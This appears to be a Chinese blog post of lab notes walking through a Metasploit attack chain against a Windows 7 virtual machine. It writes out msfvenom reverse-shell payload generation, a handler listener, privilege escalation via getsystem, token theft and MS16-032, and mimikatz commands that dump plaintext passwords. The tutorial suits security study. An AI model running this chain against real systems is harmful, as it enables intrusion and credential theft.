msf完整渗透测试

最新推荐文章于 2024-08-09 23:17:29 发布
最新推荐文章于 2024-08-09 23:17:29 发布
阅读量6.6k 收藏 34
点赞数 9
分类专栏: 笔记 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/clayzx/article/details/121343519
版权

从生成shell到远程连接

前言:

本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标:

1.生成shell
2.上shell
3.监听              
4.拿到会话
5.提权       
6.拿到密码
7.远程连接

首先此次实验需要准备一台kali的虚拟机和一台windows 7的虚拟机进行实验。两台虚拟机需要在同一个网段,相互能ping通。
这是kali的IP地址
在这里插入图片描述

这是windows 7 的ip地址

在这里插入图片描述

如果不在同一个网段的话检查一下虚拟机的设置是不是NAT
在这里插入图片描述

同一个网段,我们也可以测试一下。用我们kali ping一下windows 7或者windows 7 ping kali都行。

在这里插入图片描述

注意:windows 7要把防火墙关了,不然kali ping不通windows7!!!

在这里插入图片描述

最后Xshell连接我们的kali为了更好的操作。(没有的去官网下)

以上只是准备环境,下面正式开始:

进入msfconsole,开始我们的第一步生成shell。

在这里插入图片描述

输入以下命令:

msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=目标ip  LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 111.exe

这里windows/meterpreter/reverse_tcp是攻击的模块,大家根据需求进行更改,这个实验就不用改,后面端口也可以不改,你想换个端口也可以,最后面生成的程序名字也可以换,然后ip就输入自己kali的ip。
在这里插入图片描述
这样我们的shell就生成完了。

接下来就是把shell放到windows 7里了,这里我们用kali搭建一个简易的局域网,使windows 7通过这个下载我们的shell。用以下命令:

python3 -m http.server 端口

这时我们需要再开一个kali的会话来进行操作
在这里插入图片描述
这里也能不加端口,它会默认8000,然后windows 7通过浏览器访问kali的ip加端口,把我们的shell下载下来,上面我们升成的shell的名字叫111.exe,所有我们把这个下载下来。(如果自带浏览器访问不了,就下个火狐浏览器),下载下来后可以移到桌面,方便后续操作。到这我们第二步也完成了。
在这里插入图片描述

接下来,我们通过我们上的shell对目标进行监听,如果对方运行了shell,我们即可得到会话。回到我们之前的会话,使用exploit/multi/handler模块(监听模块),然后options,查看我们需要进行的配置。在这里插入图片描述
yes的都是必须设置的,这里我们看到我们只需要设置目标ip就行,端口和我们之前生成的shell的端口是一样的所以不需要改,但还有一点要注意,我们的payload也是需要改的,因为必须和我们之前shell设置的payload一样,否则参数都对不上如何进行监听?所以我们执行下面两个命令设置ip和改payload。设置完成后exploit或者run都行,运行。

set LHOST 目标ip
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
然后我们要运行windows 7上的shell,这样就能拿到会话了。第四步完成。

在这里插入图片描述

通常,我们可能只获得了一个很低的权限。低的权限级别将使我们受到很多的限制,所有我们需要提升自己的权限,可以使用getuid命令查看我们的权限。下面我们直接提到最高的System权限。
在这里插入图片描述

提权有几种方法,目前我只知道三种,一种普通提权,一种令牌窃取,最后一种利用MS16-032本地溢出漏洞,下面一 一 介绍:

  1. 普通提权getsystem命令提权,可以看到失败了

在这里插入图片描述

  1. 令牌窃取ps查看进程,找到最高权限使用steal_token 进程ip命令窃取,可以看到我这里只有我这个用户的权限,所以窃取不了更高权限,令牌窃取不至这么点内容,以及不了解令牌概念的可以去查查资料。

在这里插入图片描述

  1. MS16-032本地溢出漏洞 原理同上可以去查查资料,这里不祥讲了。
    首先background命令将meterpreter会话转为后台运行,然后search命令搜索MS16-032漏洞,使用这个模块,再查看我们需要进行的配置,可以看到我们只需要设置需要进行的会话就行,我们上面后台运行的会话是1,我们就设置1就行,设置完后直接运行
    在这里插入图片描述

在这里插入图片描述
运行后我们再查看现在的权限就发现是最高权限了,第五步完成。
在这里插入图片描述

最后我们利用现在的权限去拿到密码,就可以进行远程登录了。
加载mimikatz,getpid查看我们当前的进程,可以看到我们当前进程是2660

load mimikatz
getpid
ps

在这里插入图片描述

ps查看进程,可以看到我们的进程是x86,而我们的系统是x64的,所以这里需要做个进程迁移到x64,注意不要只挑x64,还要挑最高权限,我之前就是随便挑了个x64,结果不是最高权限后又从头开始了一遍,举个例子,这里我们可以挑2440,然后使用migrate 2440命令进行迁移,最后使用creds_tspkg就得到我们目标的明文密码了。kiwi_cmd -f sekurlsa::logonpasswords这条命令更详细。
在这里插入图片描述
在这里插入图片描述

拿到明文密码后,就可以进行远程连接了,输入目标ip,然后就可以用用户名和密码登录了,这里就不演示了。
在这里插入图片描述

最后,能把别人教会才能说明我是真的学会了,以上省略了我实验的很多错误,不同人可能会遇到不同的错误,这篇博客写了几个小时,真累了,不说了。

ShenHai.
关注
专栏目录
MSF多种渗透测试实例合集
weixin_45380284的博客
03-05 3648
MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏
msf 渗透测试
06-05
msf渗透
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 5395
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
渗透测试工具MSF
2303_77223717的博客
07-08 1238
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
MSF渗透测试
weixin_51646864的博客
08-12 1190
MSF入门实验
kail之MSF渗透测试
温柔小薛的博客
03-29 3142
kail之MSF渗透测试实战 本文目录kail之MSF渗透测试实战kail问题解答及msf初识什么是MSF专业术语基本使用目录结构如何更新MSF基本命令MSF渗透测试MSF渗透测试MSF渗透测试MSF后期攻击使用方法(渗透测试4~6)MSF渗透测试MSF渗透测试MSF渗透测试MSF渗透测试十payload1payload2 kail问题解答及msf初识 Kali问题解答 kail...
MSF及Windows渗透测试
最新发布
qq_67812668的博客
08-09 1049
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
MSF渗透实验
weixin_51646864的博客
08-11 1563
浏览器攻击渗透(MS10_018) 环境: 1、虚拟机Windows2003系统(靶机) 2、虚拟机linux2020.2(攻击机) 步骤: 一、启动虚拟机linux2020.2,终端输入msfconsole启动 二、输入指令search ms10_018查看一下,这是2010年的浏览器漏洞。 三、接下来搜索ie浏览器:输入指令search ie 回车后可以看到关于ie浏览器历史漏洞 四、这里选择2010年的漏洞进行实验。输入指令: use exploit/windows/browser/ms10_0
msf内网渗透
10-29
msf内网渗透
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 994
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
网络安全: Kali Linux 使用 MSF 渗透测试
cronaldo91的博客
03-05 2343
(6) 查看Kali Linux (2022.4)系统IP地址。(5)查看Kali Linux (2022.4)系统版本。(2)查看Kali Linux (2024.1)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。
MSF(Metasploit)渗透测试---黑客工具使用指南
GitHub质检员
11-17 666
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。
渗透测试神器-msf基础
Candour_0的博客
02-20 273
渗透测试神器-msf基础
【网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2984
内网渗透超级强悍
MSF 下域内渗透
A_991128a的博客
11-27 927
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!meterpreter > list_tokens -u //列出会话令牌,需要管理员权限,如果是普通权限需要提权。use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描。来假冒当初建立这个令牌的用户。run post/windows/gather/hashdump //获取用户名 hash 值。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ShenHai.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值